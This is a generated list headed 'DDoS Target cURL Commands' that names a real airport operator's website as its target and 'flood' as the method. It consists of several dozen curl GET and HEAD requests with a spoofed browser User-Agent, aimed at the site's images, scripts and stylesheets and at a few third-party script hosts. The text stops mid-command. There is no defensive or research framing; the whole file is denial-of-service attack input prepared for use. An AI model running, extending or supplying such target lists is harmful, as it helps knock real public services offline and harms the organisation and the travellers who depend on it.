# DDoS Target cURL Commands
# Target: https://www.airportthai.co.th/en/
# Attack Method: flood
# Generated: 2025-12-13T01:45:51+07:00
# Total valid endpoints: 87

curl \
  -X \
  HEAD \
  'https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-1079774556797597&amp;host=ca-host-pub-2644536267352236' \
  -H \
  'Content-Type: text/javascript; charset=UTF-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://static.addtoany.com/menu/page.js' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://static.addtoany.com/menu/page.js' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-1079774556797597&amp;host=ca-host-pub-2644536267352236' \
  -H \
  'Content-Type: text/javascript; charset=UTF-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2019/09/banner_3-300x185.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/bb-plugin/js/jquery.imagesloaded.min.js?ver=2.7.4.2' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2025/10/S__74588379-1024x1024.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/CEI-1-150x150.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.1.4' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/bb-plugin/js/jquery.fitvids.min.js?ver=1.2' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2022/09/APFF30-1-scaled.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/bb-plugin/js/jquery.bxslider.min.js?ver=2.7.4.2' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2021/01/ICON-COVID19-EN.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/BKK-1-150x150.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2022/05/otp_300x185.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2022/05/3rdRunway-300x185-1.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/pum/pum-site-styles.css?generated=1754227974&#038;ver=1.20.5' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/favicon.ico' \
  -H \
  'Content-Type: image/vnd.microsoft.icon' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/Give_Back_ENG-300x300-landscape-6db0a8b5ece855dfd3ef3b23c200722b-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/bb-plugin/css/jquery.magnificpopup.min.css?ver=2.7.4.2' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/bb-plugin/js/jquery.waypoints.min.js?ver=2.7.4.2' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2020/05/Picture1-300x166.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.4' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/HKT-1-150x150.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/Lost-Found-BKK-ENG-1-300x300-landscape-037c23deac3776eb061046dfe8c8ad34-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-includes/js/jquery/jquery.min.js?ver=3.7.1' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/bb-theme/skin-692e82e79a890.css?ver=1.7.13' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/css/style.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2023/04/%E0%B8%A3%E0%B9%88%E0%B8%A7%E0%B8%A1%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%94%E0%B8%B4%E0%B8%99%E0%B9%80%E0%B8%8A%E0%B8%B4%E0%B8%87%E0%B8%9E%E0%B8%B2%E0%B8%93%E0%B8%B4%E0%B8%8A%E0%B8%A2%E0%B9%8C-banner-org.gif' \
  -H \
  'Content-Type: image/gif' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/1-300x300-landscape-5b2b41417e3ad271bb94964b0420f4d5-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/CEI-1-300x281.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2018/05/7940021207647-300x165.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2022/09/data-governance-300x175.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2025/08/S__5251159-1024x1024.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2019/06/ita.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/336-layout.css?ver=77fff629665ad65b2395e4e887776616' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-includes/css/dist/block-library/style.min.css?ver=6.8.3' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/themes/bb-theme/js/bootstrap.min.js?ver=1.7.13' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2025/10/1761358020445-1024x1024.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/CNX-1-300x300.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/plugins/pdpa-thailand/public/assets/css/pdpa-thailand-public.min.css?ver=2.0' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/plugins/bb-plugin/js/jquery.easing.min.js?ver=1.4' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/pdpa-thailand/public/assets/css/pdpa-thailand-public.min.css?ver=2.0' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/plugins/pdpa-thailand/public/assets/js/pdpa-thailand-public.js?ver=2.0' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2020/02/WEB-Banner-ALL-Info-01-300x166.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/plugins/page-links-to/dist/new-tab.js?ver=3.3.7' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/img/logo.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2021/02/001.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/DSC_8209-300x214-landscape-92d71fc1410eb2b8d73dc6d168b4b760-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/BKK-1-300x300.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2025/11/576794175_1240201541471671_8516354685459970442_n-1024x1024.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/S__128466958-300x300-landscape-56a7132b2feb978e33272dabf7d59c59-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/plugins/bb-plugin/css/jquery.bxslider.css?ver=2.7.4.2' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/336-layout.js?ver=9750b36c8f8f45e3f142e0f1da7d5cc3' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/themes/bb-theme/js/theme.min.js?ver=1.7.13' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/plugins/bb-plugin/js/jquery.ba-throttle-debounce.min.js?ver=2.7.4.2' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.4' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/bb-theme/skin-692e82e79a890.css?ver=1.7.13' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-includes/css/dist/block-library/style.min.css?ver=6.8.3' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/338427826_965205564851573_4415111707926483906_n-300x300-landscape-d23ea307a2a14f0fef08f2e6465f8434-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/1-300x300-landscape-5b2b41417e3ad271bb94964b0420f4d5-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/HKT-1-150x150.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/%E0%B9%82%E0%B8%81%E0%B8%87%E0%B8%A1%E0%B8%B4%E0%B8%95%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C_EN-300x300-landscape-97b4fbe2ee263d4c1218f2cf41cb0c92-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2022/04/2.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.16' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2025/10/1-5-1024x931.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2022/06/BanerAPPF30.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2021/03/Banner-SDGs_01.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.1.4' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/HDY-1-300x294.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2018/04/CNX-1-150x150.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2020/02/AW_BANNERresize.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2021/01/ICON-COVID19-EN.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/bb-plugin/cache/S__128466958-300x300-landscape-56a7132b2feb978e33272dabf7d59c59-.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2020/12/oic_e_learning.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2025/06/ALL-Monitor-46-AOT_Website-1950-x-350-scaled.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2025/08/S__5251159-1024x1024.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/favicon.ico' \
  -H \
  'Content-Type: image/vnd.microsoft.icon' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2023/04/%E0%B8%A3%E0%B9%88%E0%B8%A7%E0%B8%A1%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%94%E0%B8%B4%E0%B8%99%E0%B9%80%E0%B8%8A%E0%B8%B4%E0%B8%87%E0%B8%9E%E0%B8%B2%E0%B8%93%E0%B8%B4%E0%B8%8A%E0%B8%A2%E0%B9%8C-banner-org.gif' \
  -H \
  'Content-Type: image/gif' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
